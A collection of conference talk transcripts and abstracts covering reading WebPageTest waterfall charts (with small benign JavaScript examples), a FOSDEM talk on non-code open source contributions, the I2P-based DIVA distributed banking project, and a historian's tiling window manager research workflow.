a JavaScript and asset heavy page, for a chart to be hundreds of requests long. In this example many requests have been omitted from the waterfall chart to make it more readable. These omitted requests can be identified by the three dots highlighted in green — look for the customise waterfall link under the waterfall diagram to do this. Back to our errors and status codes. Requests one to ten are all fine — they are 200 status codes. Requests 99 and 101 are error codes; the red background may have given this away. In this case these are 400 response codes.
This refers to a bad request. The status code is seen in brackets after the request timing data. The timing value seen is the time taken to complete the request; this includes TCP connection negotiation if required, but excludes wait time. Requests 123 to 130 are 302 status codes, and are seen with the yellow background. The 302 code is the found but temporarily moved status code. Notice that the browser still has to set up expensive TCP connections in a few instances just to receive this 302 status code. This is certainly something to watch out for when using third parties. Next up, a recent addition prompted, I believe, by Andy Davies. Each request comes with a document value in the details panel that tells you where the request was initiated from. Requests two to five are initiated from the root document, as the text is black. Requests 11 and 28 are from new HTML documents. Notice how the asset is in blue, and note that the text is also in blue to signify they have a new document value — the request was initiated from somewhere other than the root document, most likely an iframe in this case. Notice further down that requests 47 to 49 are also blue; these are assets being downloaded by the iframe. The blue request text doesn't only happen with iframes — it also happens with service workers and all the assets that they load. And here's how it's displayed in the details panel when clicking on the requests: the top image we see is the root document, the bottom image is the third party iframe from Google with a different document value. I mentioned the pink lines for JavaScript execution earlier. The JavaScript execution can be seen in pink on the row of the request that triggered it. In this example we see a solid block of pink. But is this very intensive JavaScript running, or just short, fast, repeated execution? Looking at the Page is Interactive bar below gives an indication — in this example it is solid red. But a recent JavaScript visualisation change has made this feature even more useful. Now, when JavaScript execution is rendered, you don't always just see a solid block of pink. The height of the pink bars indicates how long the JavaScript ran, so fast but frequent JavaScript execution will have very short bars and will no longer dominate the view. You can actually see this in the example. This functionality is only available in Safari, Chrome and Chrome-based browsers; Firefox doesn't expose this information. Wouldn't it be great if you could add your own custom markers to the waterfall chart to see where certain events happened during page load? It's actually quite simple: just use the mark method in the User Timing API and add it to your page code. These marks will be shown on the waterfall chart as vertical purple lines. These user timing marks don't show up in the default waterfall chart on the public instance of WebPageTest, but if you have your own custom instance they can be enabled by default. The only way to see them using the public instance is to view the waterfall using the customised waterfall link below the waterfall chart, which I mentioned earlier — that's the view you can see in the slide. The reason for this is that many third parties leave these marks in their code, meaning there would be a lot of noisy looking waterfall charts when using third parties. And one last point on this: the actual timing for each of these events is shown just below the summary table for the test run.
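(An illustrative aside, not from the talk: the mark method mentioned above is part of the standard User Timing API, so here is a hedged sketch — the mark names are made up purely for illustration.)

// Drop a named mark into your page code; WebPageTest can draw it as a
// vertical purple line on the waterfall.
performance.mark('hero-image-rendered');

// You can also measure the time between two marks.
performance.mark('carousel-init-start');
// ... carousel setup work ...
performance.mark('carousel-init-end');
performance.measure('carousel-init', 'carousel-init-start', 'carousel-init-end');

And since the Page is Interactive bar described above flags main-thread blocks of 100 milliseconds or more, a similar signal is available in the browser through the Long Tasks API — which reports any task over 50 milliseconds, so filter to 100 milliseconds if you want to match the bar:

// Log main-thread blocks of 100 ms or more as the page runs.
new PerformanceObserver((list) => {
  for (const task of list.getEntries()) {
    if (task.duration >= 100) {
      console.log(`Main thread blocked for ${Math.round(task.duration)} ms at ${Math.round(task.startTime)} ms`);
    }
  }
}).observe({ type: 'longtask', buffered: true });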
So let's quickly look over some scenarios and see what else we can learn. Now, you may have seen this pattern in previous slides, I'm sure, but I just want to point it out to you. When running a test using Chrome, the resulting waterfall will have a common pattern. This pattern is called the stair step. The top step can be seen in red, the bottom step in black. So what's happening here? This is essentially a separation between the assets in the head and the body. It's a prioritisation strategy Chrome uses to improve performance: Chrome will dedicate most CPU and bandwidth to getting the page head set up before then concentrating on assets in the body. This example is on HTTP/1.1. Notice the TCP connection at request 15. This request is for an image that is located in the body, but it's being requested at the same time as the head assets. So Chrome isn't completely ignoring the body, but resources in the head are the priority. I mentioned the CPU graph at the bottom of the waterfall chart earlier. Here's an example of what can happen to a waterfall chart when the device is CPU limited. It looks fairly standard until you look closely, then you will notice the gaps between the requests. These gaps on requests 24 to 26 show a large amount of inactivity that has a huge impact on performance. If you examine the CPU graph directly below these gaps, it points to the reason why they are happening: the graph is maxed out at 100% over this time period. But we see the opposite in the network activity — there's really nothing happening at all. Examining the browser main thread, there's some script parsing and execution in orange and some page layout tasks in purple, but nowhere near enough activity to cause the CPU issue seen here. So something odd is going on. I'm afraid I don't have an explanation as to why the CPU is maxed out in this instance, mainly because it was a low spec device that was having issues, but it shows how useful the other graphs can be when used in conjunction with the waterfall chart. And finally, an unusual waterfall that cropped up in a government service recently. I've actually written a whole blog post about this waterfall chart and what was happening with it. We use SpeedCurve to monitor our services at GDS. These tests run every day and look for web performance issues. On this service we saw the number of fonts being downloaded literally double overnight, from three to six. Nothing had changed — no releases, no code deployed. It just happened randomly. Examining the graph you see the font size double. In fact, the historic graph data shows that this issue had randomly happened and fixed itself many times in the past. If we look at this waterfall, it gives some insight into what's happening. Looking at requests 12 to 14 for the WOFF2 fonts, you'll see this really strange set of gaps between the download chunks. Now, it took a while to figure out exactly what was going on here, but long story short, we weren't serving the Vary: Origin header with our fonts. So the CDN cache was being poisoned and serving up the fonts with incorrect headers. Essentially, another device was connecting, the headers for this device were being cached and then served to our test browser, which was a different device. The browser was seeing these incorrect headers and immediately rejecting the fonts.
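(A hedged aside, not from the talk: the fix this points to is making sure cross-origin font responses are cached per requesting origin by sending a Vary: Origin header alongside the CORS header. The sketch below uses Express purely for illustration — the actual fix for the service described here sat at the CDN/server configuration level.)

// Illustrative only: serve fonts with CORS plus Vary: Origin so shared caches
// don't hand one origin's Access-Control-Allow-Origin header to another.
const express = require('express');
const app = express();

app.use('/fonts', (req, res, next) => {
  res.set('Access-Control-Allow-Origin', req.headers.origin || '*');
  res.set('Vary', 'Origin'); // tell caches the response varies by requesting origin
  next();
}, express.static('public/fonts'));

app.listen(3000);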
You can actually see all this happening in the waterfall. Requests 12 to 14 are made for the WOFF2 fonts, very thin slices of data are received back from the server — which is probably the headers — and the browser immediately cancels the requests. This is seen in the waterfall by the light red colour simply disappearing. Almost immediately after this happens, the browser makes a request to the fallback WOFF fonts. This then doubles up the number of font requests and increases the bytes being sent to the browser. The dark red patches that now look to be floating are likely to be data that was already in one of the various buffers between the server and the browser — already in transit, so it couldn't be cancelled. This is just an example of how much information you can get from a waterfall chart once you understand some of the internals. Without SpeedCurve and WebPageTest this would have been almost impossible to identify and fix. As we come to the end of the talk, you may be asking where to go if you want to find out more information. Here's a list of links and various resources if you want to find out more about WebPageTest. There are some shameless plugs in there from me, as well as talks from Pat Meenan and Andy Davies. I'll share these slides after the talk. This talk is based on a blog post I've written called How to Read a WebPageTest Waterfall Chart. I did the research and pulled the information together for this post, but I've had lots of input from folks in the web performance community with corrections, additions and general advice. So a big thank you to all these lovely folks — all their Twitter handles are listed, and they are worth a follow if you don't follow them already. I hope you found this talk useful. Thanks for listening, and if we have time I'm more than happy to try and answer any questions that you may have. We'll start from the top then. When you go through the waterfall chart, what's the first thing that you look for? So the first thing I would look for is probably the actual width of the waterfall chart. That gives you an idea of how long it took the page to load, and if you're particularly looking at things like large images, they're going to have a large solid block that takes a large amount of time, so you can quickly identify the large assets on your page by looking for these large blocks that take a very long time — and that's the same with JavaScript and with fonts as well. If they're quite extended, then you can immediately see, okay, I have an unoptimised image here, or I have a ton of JavaScript, that I can potentially identify and optimise. That would probably be one of the first things I'd look at. So you've spent a lot of time now writing about waterfall charts — do you see anything that should be improved, or is there something missing that you'd want? I'm always annoying Pat Meenan — I'm sort of constantly talking to him about various things. I have a couple of large screens in front of me which are very wide, so one thing I would love to be able to do is maximise that space. The actual view of WebPageTest is quite thin at the moment, so maybe there could be a setting to maximise the view so you can really utilise all of the space on bigger screens. I'd also like the ability to export — well, you can export data, you can export the JSON from the test and from all the test runs as well — but it would be great to actually be able to export that, hold it somewhere, and somehow import it at a future date to go back into it, should the test be deleted for some reason or you lose a test, so you have this ongoing record of those tests.
Those would probably be a couple of them. The only other thing, which I think I've already mentioned to Pat, is about quickly being able to rerun a set of tests but with slight modifications — so you run a test with a particular setup and you want to change the label so it says HTTP/1 instead of HTTP/2, or you want to change just one particular setting. The ability to do that would be really, really useful, to be able to test and compare later. Okay, cool. And one question from Tim: what are your default settings for the network when you do your runs, and why? So I do a lot of testing of gov.uk and our services at GDS. We've got various services here, and I have access to — well, everyone has access to — the CrUX data, the CrUX dashboard, where you can look up a domain, and it shows around about 2.4 percent of our users are on an effective 3G connection, so I often set it to 3G just to get an idea of, okay, for
WebPageTest is one of the most well known and important tools in the web performance community. It has been actively developed by Pat Meenan since he worked at AOL in 2008. It has become the go-to tool for everything from very simple to very advanced debugging of the web performance of a website. One of its most well known charts is the waterfall chart. In this talk I'm going to introduce the waterfall chart and also go into detail on how you can examine and read it. The more you understand about the chart, the more WebPageTest as a whole will be able to help you fix a slow performing website.
10.5446/52840 (DOI)
Hi, everyone. Welcome to FOSDEM 2021. I'm going to be giving a lightning talk on contributing beyond code, and it's going to be like my six months — or rather eight months — review so far with contributing to open source. Okay, I'm Ruth Ikegah, I'm from Nigeria and I'm a back-end developer. I'm also a technical writer and I'm part of the GitHub Stars program as a GitHub Star. So let's take a dive into my journey so far with contributing to open source. So this is a screenshot — I'm not sure it's so visible, but this is a screenshot of my first tweet. I made a tweet about the first contribution I made to open source. It was with the first-contributions repository on GitHub, the repository where you just add your name to the contributors list. After the contribution I made a tweet about it and gained over 200 likes, with so many people congratulating me just for putting my name on the contributors list, and this was like the start of my journey. So WOSCA here means Women of Open Source Community Africa. This is an initiative from the open source community here in Africa and an NGO called She Code Africa, where the idea of the initiative was actually to spur women in Africa into contributing to open source, and this was the start of the initiative — that was in June. Then there was this challenge, somewhat similar to Hacktoberfest, where in the month of July you get some pull requests in, and at the end of the month the person with the highest number of pull requests gets a domain name for free. So I participated in this challenge as the start of my open source journey, and I think I had the highest number of pull requests, and it was like the start of something beautiful for me in the open source space. Just chipping in: I was like three months into coding and I was still a beginner at that point, so there were so many challenges for me starting off. But counting how much open source has actually helped me — helped my technical skills, helped me personally — I would say it has been an amazing ride for me. So I'll be sharing step by step how I contributed and the organizations that I found welcoming and am currently part of. So the first community I engaged in was the GNOME community. There's this project, the scalable onboarding project, headed by Sri. This project is actually about how to do scalable onboarding — how do we make onboarding better in the GNOME community — and that was the first open source project I looked at. It was not a code project, right, so it was just discussions and discourse about how onboarding has been in the GNOME community: let's gather data, let's gather metrics that will help better onboarding in the GNOME community. This project was really, really interesting at the start, and like I said earlier I was just three months into coding, and GNOME uses GitLab. So starting off, at least I knew GitHub — I knew how to use GitHub, or I knew what GitHub was — but I had to learn another one, which is GitLab, right.
So initially, contributing was a whole lot of stress. I had so many Git problems — I think for the first pull request I made to the GNOME project, I forked the repository, like I cloned and forked the repository up to five times, just to make one pull request, because I kept deleting and adding, and it was a whole lot of frustration. So that was the first project I got involved in in GNOME, and over time I am still part of some other projects, like the Extensions Rebooted initiative, and I contributed to GNOME — I think last year I was part of the volunteers at the GUADEC 2020 conference, and it was really an amazing experience for me. So finding GNOME and the people around the project I was contributing to — like Sri, Samson, Regina — was really very awesome, because I felt welcome. I was not contributing code at that point, but I still felt welcome, my ideas were heard and I improved the project in the way I could. Next I want to talk about the second community I found, which is the Layer5 community, the service mesh community. It was really very welcoming to me, and I think the first pull request I made to the Layer5 community was on the readme. There was this change that was needed across the readme on each repository, so I was able to change those typos and enhance the readme. The community so far has been welcoming, and I even got to join the onboarding program, which we call the MeshMates program, where we help newcomers and new contributors get conversant with the Layer5 project and everything around the community. Another project I really got involved with is the CHAOSS project, where I joined the Diversity and Inclusion working group. So far I've done so much in a short while with the Diversity and Inclusion working group in particular. I remember last year we started defining a metric about burnout, which is something people in open source communities do not really like to talk about, and I've been able to actively contribute to this in the Diversity and Inclusion working group. The metric is still in process, still in review, and I hope soon it will be out for others to check out and to talk about burnout in their communities. Secondly, there's a project in the CHAOSS space called the badging project — the D&I, diversity and inclusion, badging project — and basically what that project is about is, for starters, we started with conferences: giving diversity and inclusion badges to conferences that are diverse and inclusive. It's something you really should check out, and I'm sure you'd be happy and impressed with what we've been doing at the badging project. So far, contributing to open source and contributing beyond code — I have some code contributions too, but I think like 80% of my contributions so far to open source have been non-code contributions, right. And so far I have improved the skills that I've listed out here, one of which is empathy.
So far, with contributing and helping others, I have applied empathy, because sometimes when you hop into a new project as a newcomer it's usually very frustrating, right — getting around the docs, getting around the code base. So with my contributing to these open source organizations and projects, I have been able to help other newcomers and contributors find their way around the community and get familiar with the community. I have applied empathy, I have tried to be patient with helping out, hand-holding and the rest of it. I have improved public speaking: I have tried to speak and advocate for new contributors, and last year, 2020, I spoke at, I think, up to eight conferences and events, so I have gained public speaking skills. I have also improved at writing and documentation, because for most of the projects I contribute to I have helped in improving the docs — checking, giving reviews, looking at what can be changed and what should be changed. I have also improved at moderating. With my volunteering at conferences — I think last year I volunteered with the All Things Open conference and I moderated a particular room for, I think, six hours straight — and over time, even in the Layer5 service mesh community I contribute to, we always do a newcomers call every Thursday and I'm one of the people who moderate that call. So far it has been interesting, and I've got to improve my skills and, most importantly, people skills, right. I have learned how to manage people better, how to talk, how to be inclusive — especially how to include other people, how to manage people, how to care for others. So these are the skills — and I think many more — that I am proud to have gained so far in contributing to open source, and it's beyond the code, right. So aside from the fact that, yes, code contributions are really, really important, contributing to open source is beyond code, and there's so much to do in the community, so much to help around. There's a contributor being frustrated somewhere about the code base that you can help, which is what I have been focusing on for like the past six to eight months. And the biggest recognition for me so far with contributing to open source was when I joined the GitHub Stars program and found out that I was the first female GitHub Star in Africa. It's something that is really, really dear to me, because so far my contributions were not just code — I helped the community, I helped the people around the community, I applied so much empathy, and that's basically what got me to the point that I am at. So for someone listening right now, I would say open source for me is not just about the code: it's about community, it's about helping others, it's about improving people's lives through software. So in your community, in your project, try to appreciate those that are not contributing code, try to make them feel welcome, try to make them feel loved and appreciated. And I'd love to end this talk with this quote that says open source is not just about the code. You can contact me on Twitter at IkegahRuth, via email, or you can check out my GitHub handle, and
thanks for listening to my talk. I hope you enjoy the rest of the conference. Thank you.
Starting my contributions as a beginner in tech was an amazing journey and really something worth sharing because I was able to contribute beyond the code by actively helping out other beginners get involved. It took me from submitting talks about including beginners in OSS, making explanatory blog posts, tweeting about OSS, getting involved in onboarding teams to improve the process, and even having one on one calls to help out others get involved. In this talk, I will be sharing my challenges, strategies, and accomplishments so far highlighting my biggest recognitions which is joining the Github Stars program.
10.5446/52841 (DOI)
Hello and welcome. My name is Konrad. I'm from DIVA. This talk is about an I2P-based, fully distributed bank — it's about free banking technology for everyone. At DIVA we're creating technology enabling the storing, transferring and trading of any existing or future digital values. All we're doing at the association is licensed under the AGPL version 3 or Creative Commons, so it's a truly open source and free technology project. The agenda of this talk consists of seven items. We're starting with the association DIVA. We're continuing with the scope of this project — so, what's free banking technology? We continue with the privacy and anonymity layer I2P, the network stack. We're looking at the storage — the fully distributed storage, which is a blockchain. The backend, the business logic, is interesting. The front end, the user experience where we are today — this is terribly important. And last but not least, I'd like to introduce you to the DIVA community. I hope you enjoy this talk, so let's get started. The association DIVA.EXCHANGE: we're an association under Swiss law, located in Switzerland. There are two founding members, Caroline and myself, and there are other members, because it's free and open to everyone. So please join. Currently there is also a membership fee. So please join the association DIVA.EXCHANGE. All we're doing is licensed under the AGPL version 3 or Creative Commons, so all our technology is in the public domain. We're independent, we're agnostic and scientific, and all we're doing is 100% yours. There is nothing like a central service involved. We're fully distributed — all our technology is fully distributed, not decentralized: fully distributed. And we're relying on donations as an association. So please donate your work, donate cryptocurrencies, or just join the association first and take a closer look at what we're doing. Clarity, transparency, openness — that's really, truly important to us. You find the association on the website, diva.exchange. Now, what's free banking technology? What's the scope of DIVA? The network is the market, and in this network we have nodes, and each node is a bank in this market. That's kind of the core concept. Every user forming such a node can enter or leave the network anytime without losing data, without losing digital value. That's also very important to end users. So it's borderless. There is nothing like a walled garden — DIVA is borderless. Every user is running their own software, the DIVA software, on their own device, and is forming such a node. The network itself is a peer-to-peer network, so that the users, the nodes, can exchange digital values. They can pay with it. So it's a payment network, it's a trading network, and each user can store the digital values on their own device. The peer-to-peer network is based on I2P — we'll take a closer look at I2P later — which gives full privacy to the end user within the DIVA network. This is important in such a market. Since every user is forming their own node and their own bank, every user can also keep the transaction fees of those transactions which are processed on their node. Remember, we do not have any coin or any token involved. There is nothing like a DIVA coin or a DIVA token. We're borderless, we're not a walled garden. So every user keeps their own transaction fees in their own chosen digital value. The network layer of DIVA is based on I2P.
I2P is a long-standing open source project, and it's focused on providing the software to build a private network. This functionality is very important to DIVA, because the nodes within the DIVA network are private — they do not know each other, but they want to communicate with each other. If you look at I2P, each packet which leaves a node and travels to a different node in the network hops over several other nodes, and the response from the destination also hops back over different nodes. This makes it very difficult, for example, to spy out traffic as a man in the middle or as a provider, and this is one of the important features of I2P. I2P is resistant towards a wide spectrum of attacks on the network, and because of this resistance, and since I2P is long-standing, it is the preferred choice for DIVA. Scientific projects supported by DIVA, together with universities in Switzerland, help us to better understand and to better research the I2P network. Since it's our underlying technology, we run regular scientific research on it — again this year, a new project is researching I2P. We're supporting and driving these efforts because I2P gives privacy by design to DIVA. Free banking technology requires some storage, because the transactions, the books, the digital values must be stored locally. And since DIVA is truly and fully distributed, it has to be a redundant, reliable storage — and that's a blockchain. And since DIVA has no central component at all — as I said, not even a DNS — we needed a truly distributed storage solution, and we decided to work together with the Iroha open source team. Iroha is a very lightweight, highly energy-efficient blockchain technology. It's using the Yet Another Consensus (YAC) algorithm, so it's not a proof-of-work or a proof-of-stake algorithm — it's just fault tolerant, and that's exactly what we needed. It was lightweight, it was fast, and it wasn't stable. So we helped the Iroha team in the past months to stabilize their technology. Additionally, we added our own code — under the AGPL, by the way — to make it permissionless. So today we have a permissionless storage framework which works very well for DIVA. Additionally, again together with universities and schools, we have projects which are trying to break our storage, to inject malicious nodes, to be hostile and to destroy DIVA. That's important to us — the security focus is to take a very close look, together with schools and universities, to get a deep understanding of how the storage layer is working, under which conditions, and where its problems are. I'd like to show you the Blockchain Explorer, which we have written for Iroha. It works for every Iroha blockchain, not only for the DIVA network. We have written this to visualize the blockchain a bit better — to show the blocks, the peers, domains, roles and such, which is important to us as developers of DIVA. You can find this Blockchain Explorer live on our testnet, testnet.diva.exchange. DIVA has a backend. The backend is the business logic — some people also call this the protocol — and this business logic contains the rules for how the bank works, how the application works. There are things like what an order book looks like, what a transaction looks like, how it is stored on the blockchain, how the communication with I2P works, stuff like that. This backend forms the bank.
This backend is written in JavaScript. We decided to go for JavaScript because we believe that JavaScript has quite a broad developer base and it's entry-level friendly. Since we want to create free banking technology for everyone, we also wanted a low entry level on the backend, so that it's not super complicated to get started as a coder, as a developer. We believe that JavaScript is a way to reach this target. We try to write very elegant, modern and understandable code in JavaScript. It's well documented, we have nice standards, and all contributors are very, very welcome. You'll find our code on Codeberg at codeberg.org/diva.exchange/diva — this is a Gitea repository. Codeberg.org is very open source friendly, and they're an association in Germany. So, as we are an association in Switzerland, DIVA, there is Codeberg.org in Germany. All right, so please take a look at codeberg.org/diva.exchange, sign up and give us some stars. Help us out on the backend — we would really appreciate that. The front end of DIVA needs some love. The user experience is important, especially for free banking technology for everyone, so it should be accessible and good looking for the majority of the user base. It's very lean, it's written in HTML, CSS and JS, and it doesn't have many dependencies — there is a dependency on Bulma, which is a CSS library, and a dependency on Umbrella.js. So it's really very lean: for example, the whole trading interface has a weight of below 400K uncompressed. So it's really fast, it's really lean. We're looking for some support. We're looking for user experience people who want to help us make this front end look great. Since we're all backend people — we're all blockchain and storage and I2P guys — we'd really like some help in the area of the front end. So please talk to us over our platform, diva.exchange — there you find our contact details. Talk to me, talk to Caroline, but get in touch with us if you're a user experience kind of person and help us with the user interface of DIVA. Now I'd like to do a quick tour of the user interface of DIVA, so that you have seen where we are today. You see here the trading functionality, the order book. The order book consists of a bid and an ask side — that's buying and selling. And you can see the challenges in the user interface: this has to look much nicer, that's what we believe. The functionality is here, so you can add orders to buy — for example here it's the BTC–Monero, the Bitcoin/Monero pair, just as an example. So you can add some buy orders and you can add some sell orders, and then your personal order book will be displayed, and the order book of the market will be displayed below. The backend is then writing the data on the blockchain.
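(A purely illustrative aside, not from the talk and not the actual DIVA protocol: the field names below are my own assumptions, just to make the idea of an order-book entry concrete before the backend records it on the distributed storage.)

// Hypothetical shape of a limit order as it might sit in a local order book.
// None of these field names are taken from the DIVA code base.
const order = {
  pair: 'BTC_XMR',        // the Bitcoin/Monero trading pair shown in the demo
  side: 'bid',            // 'bid' = buy, 'ask' = sell
  price: '0.0045',        // amounts as strings to avoid floating point rounding
  amount: '1.25',
  timestamp: Date.now()
};

// The backend would validate such an order, merge it into the local order book
// and write it as a transaction to the distributed storage layer.
console.log(JSON.stringify(order));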
So now you have seen the state of the front end today, and now you understand why the front end needs some love. We're almost through with this talk. Last but not least, I'd like to introduce you to the DIVA community, where we all learn and evolve. We're a very friendly, open-minded and highly diverse community of software developers, creatives, writers and even an artist. This community is very friendly to newcomers, so please join us — we'll help you board this train, because there is lots of stuff in this DIVA box. There are user experience challenges, there are blockchain challenges, I2P stuff, there is scientific work — because never forget, we're independent, we're agnostic and all we're doing is 100% yours. So you can get involved in this AGPL version 3 project, in the software project, as a developer, as a creative, as a writer. Now, last but not least, I'd like to show you a picture by an independent German artist. He's called Mondstern, he's also active on Codeberg.org, and he paints real pictures on canvas — pictures that contain icons or logos of open source software. So here is the picture, the acrylic on canvas of diva.exchange, created by the artist Mondstern. Thank you very much, thank you for your valuable time, thank you for your continuous support of open source software — you're great. [Music] Hello everyone, thank you for listening and joining this talk. I'd like to start with the questions. The first question I see here on the screen is: is this a bank or an exchange? I don't really get it. Since it's fully distributed and every bank is also an exchange, it's both, to be honest — at a very early stage. I must also say we're a fully distributed bank because the digital values are stored locally, and since every bank can do transactions together with other banking partners in the peer-to-peer network, it's an exchange. Right. I took this question first because I hope it clarifies quite a bit that banking and the exchange are kind of the same thing for us. Right. What are the known limitations of peer-to-peer decentralized banking? Which typical banking business processes cannot be provided this way? That's the next question. We have millions of limitations — we're quite at the beginning of our project. So we're writing code, we're writing documentation, we're writing papers together with universities to better understand what's possible. The very first thing we're doing is trying to implement this trading functionality. Due to the age and the way cryptocurrencies are established — just to take any two, like Bitcoin or Monero — we want to integrate the swap first, and we want to try out this swap in a fully distributed way. It's a trustless network, so we have to solve quite some challenges on the way, together with our research partners and also for ourselves. So there are many, many limitations. We don't think yet about credit business or stuff like that. Let's focus first on trading, which for us is the same as payment. So we try to focus on that. Now, next question: which currency is used for banking? DIVA itself — we're not a coin, we're not a currency. We do not have any business model at all. So every node which is running a bank keeps the transaction fees on its own.
Imagine: I2P (aka "Darknet"), a highly energy-efficient, new and fully distributed storage engine, some basic banking business logic and a fresh user interface. Result: a highly privacy-respecting, in theory secure, yet very slow, personal bank. Meet diva.exchange - the first non-profit, non-corporate, very-small-tech and research-driven association developing "Free Banking Technology - For Everyone". All licensed under AGPLv3+. The presentation is about the technology stack of the truly distributed free banking technology "DIVA". It's also about the fact that "distributed technology" does not offer anything like a "business model" in the old-fashioned-cloudy way. It's about the overlay network "I2P". It's about the distributed storage engine "Iroha" and the challenges with a very slow network. It's about banking business logic, the user interface and its challenges being fully distributed. And it's about the research co-operations in Switzerland. DIVA is small and local tech for everyone.
10.5446/52843 (DOI)
Hello everyone, my name is Corey Steffen and I am currently a PhD candidate in the Department of Theology at Marquette University in Milwaukee, Wisconsin, United States. My presentation is titled Free and Open Source Software for the Professional Historian: Optimizing a Multisource Historical Research Workflow in BSD or GNU/Linux with a Tiling Window Manager and Manuscripts Galore. Thank you for having me. Many professional historians research and write with rather haphazard desktop or laptop computer setups. Perhaps it is natural for the sort of mind that thrives on piecing together minutiae from historical documents to tend to be different from the sort of mind that thrives on learning to use cutting edge technology. However, the busy scholar cannot afford to work without keeping as many tools for efficient research and writing in her toolbox as possible. For example, the operating system for historians working with myriad large documents ought to be lightweight and stable. I have had my Ryzen-powered desktop with 16GB of RAM crash because I was manipulating a manuscript facsimile that used 13GB on its own. And I have had a regression in LibreOffice Fresh render a work-in-progress dissertation chapter unable to be edited until I downgraded to LibreOffice Still. Needless to say, neither moment was pleasant. Most big name open source operating systems that are not completely rolling release are well suited for the job, such as FreeBSD, Debian, or Manjaro, but the scholar must take care to use long-term support kernels and software whenever reasonably possible. Beside the operating system, the window manager is the most important part of the historian's toolbox. For multi-source historical research and writing, the use of a dedicated tiling window manager can improve efficiency quite dramatically. Facsimiles, database query tools, and other items that one might need to have opened simultaneously in various windows are placed exactly where one intends rather than in a random location like in stacking window managers and therefore most traditional desktop environments. Moreover, no windows are allowed to overlap and each window occupies all the screen space allotted to it. There are dozens of tiling window managers available for the X window system atop the BSDs and GNU/Linux. Generally, they can be placed inside one of two broad categories, manual and dynamic. Manual tiling window managers, which require the user to specify exactly where each window ought to be placed, have an advantage with regard to precision. Yet, they tend to be too tedious for multi-source historical workflows. Dynamic tiling window managers, which position windows automatically, are both simpler to use and more efficient for the kinds of tasks that we undertake. 100% accuracy is less important for the scholar than being able to have a lot of windows open at one time without any overlap. Thus, I recommend a dynamic tiling window manager. As for which of the many dynamic tiling window managers is best, I must remind my audience at the free and open source developers European meeting that most of us professionally studying history are not software developers. Thus, window managers that require deep programming or scripting to customize are not viable.
Among the many perfectly fine remaining options, the ubiquitous i3WM and the lesser known spectrwm are noteworthy because they have human readable plain text configuration files, which are almost as familiar at first look for a historian accustomed to reading ancient lists in ancient languages as I imagine that they are for a system administrator accustomed to editing FreeBSD's beautiful configuration parameters. These are the two window managers that I am going to showcase today, using my current workflow, within which I combine the two, as a case study. On my desktop, I run i3WM and on my laptop, I run spectrwm. I use my laptop as an extension of my main desktop workflow with the open source KVM switch emulator Barrier, which allows me to seamlessly use the same keyboard and mouse with both. Here is my blank i3WM desktop setup on my 27 inch 4K display. There's quite a bit of screen real estate, but smooth workspace switching is still helpful. I have my recording tools on workspace 8, for example, to leave 7 workspaces for what I am about to show. The center of my workflow is the glorious triad of LibreOffice, Firefox, and the citation management tool Zotero, each of which I open with a quick keystroke. All that I have to do is type mod plus control plus z to open Zotero, then mod plus control plus L to open LibreOffice, and finally mod plus shift plus F to open Firefox. There are many ways to automate this in most tiling window managers, including i3, but I find that I like to open each application window on my own, just a little less automation for the sake of being able to decide exactly what I would like to have running during a given study session. I do all of my writing in LibreOffice Writer, Still branch, with light text on a dark background. As an example, here is my presentation for today. I use extensions for LibreOffice to help with spell checking my various research languages. The ancient Greek extension deserves special praise for its wide array of features and decent accuracy with the range of Greek that I need to quote, from Attic to Koine to Byzantine. The Latin, French, and German dictionaries that I have installed are all quite helpful as well. Thousands of extensions and templates for LibreOffice are available in the official repository. Now it might sound obvious to use Firefox, as probably almost everyone here does, but there is more to it when it comes to scholarship than simply using a good web browser. Extensibility is what makes Firefox amazingly powerful for academic research and writing. I have 13 extensions and 9 user scripts installed in Firefox on my desktop, most of which help me with work in some way. These include tweaks for the Desire2Learn learning management system that my university uses, Markdown Here so that I can write most HTML5 messages in plain Markdown, Refined GitHub to help me navigate resources on everybody's favorite Octocat, and more. For dissertation writing, the official Zotero extension, Zotero Connector, and LeechBlock NG are two of the most important extensions. The former pairs my web browser with my citation management tool, and the latter, LeechBlock, helps me stay focused on the task at hand rather than wasting time in multimedia websites. Zotero handles Chicago style notes and bibliography humanities citations quite well.
The official Zotero extensions for Firefox and LibreOffice work together so smoothly, in fact, that occasionally I am able to add an entry to my dissertation's running list of works cited from my home institution's library website in Firefox with one click and then actually cite it in the target location with only one more. Otherwise, I might have to spend a few minutes with cleanup inside Zotero, but then I do not have to worry about the particular source being cited properly for the rest of the dissertation, save for odds and ends like dashes, semicolons, italics, things of that kind. Beyond LibreOffice, Firefox, and Zotero, each scholar will need to use his or her own specific research tools. I have found GitHub and GitLab to be the best places to search for them. I am specifically a historical theologian, which means that I study Catholic theology in history. Thus, I often run searches to see what kinds of utilities people are writing for theology, religious studies, the history of Christianity, Greek, word parsing, and so on. For anyone who might be interested to read what my favorite projects of that kind are, please feel free to visit the awesome theology curated list of open source software for Catholic theology that I have made on GitHub. One of many things that is specific to my work is the need for aids for analyzing different translations of various parts of the Bible. I use both graphical user interface and command line interface biblical study tools. For GUI, I use either BibleTime or Xiphos, depending on whether I am using a mostly Qt or mostly GTK setup respectively. At the core, BibleTime and Xiphos are both GUI front ends for the SWORD Project. Here I am showcasing BibleTime. There is nothing quite like having Greek, Latin, German, and English versions of a particular passage open side by side for comparison, with the ability to copy and paste any of the text. I keep the CLI tools permanently open on my laptop. Here is my typical window configuration in the simple spectrwm installation that I have on my laptop, pulled up by trusty old x11vnc. You will see that I have three CLI Bibles open: Greek Bible, GRB, which contains the full text of the Septuagint and the Greek New Testament, and for example you will see Mark 1; Vul, which contains the full text of the Vulgate Latin Bible, so for example there is Mark 1 again, or else I might open the Vulgate, so Vul, John 3:16, a classic verse; and KJV, which contains the full text of the King James Version English Bible, and then I also have Mark 1 open again. I also make extensive use of William Whitaker's Words, which you see on the left side of this screen, which is an old, trusted Latin word parsing tool that is kept alive by a dedicated group of users and developers in one central GitHub repository. So for an example of using this, I could see John 3:16 starts with sic, type sic, and then I see it's an adverb that means thus, so, and so on. Finally, I have various shell aliases on both systems to launch what I need automatically. For example, if I need to open St. Thomas Aquinas' Opera Omnia, or Complete Works, in the ELinks CLI web browser hosted locally, I simply type tom. If I need to open ranger directly to the file directory in which I keep all of my dissertation documents, I type diss. A minute saved here, a few seconds saved there, and by the end of the day, I have saved enough time to accomplish a little task that I otherwise would not have been able to accomplish.
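As an aside for readers following along at home, here is a rough sketch of what the keyboard-driven shortcuts described in this talk might look like in practice. The speaker does not show these files, so the keysyms, paths, and commands below are my own assumptions rather than his actual configuration.

```bash
# Hypothetical i3 launcher bindings appended to ~/.config/i3/config;
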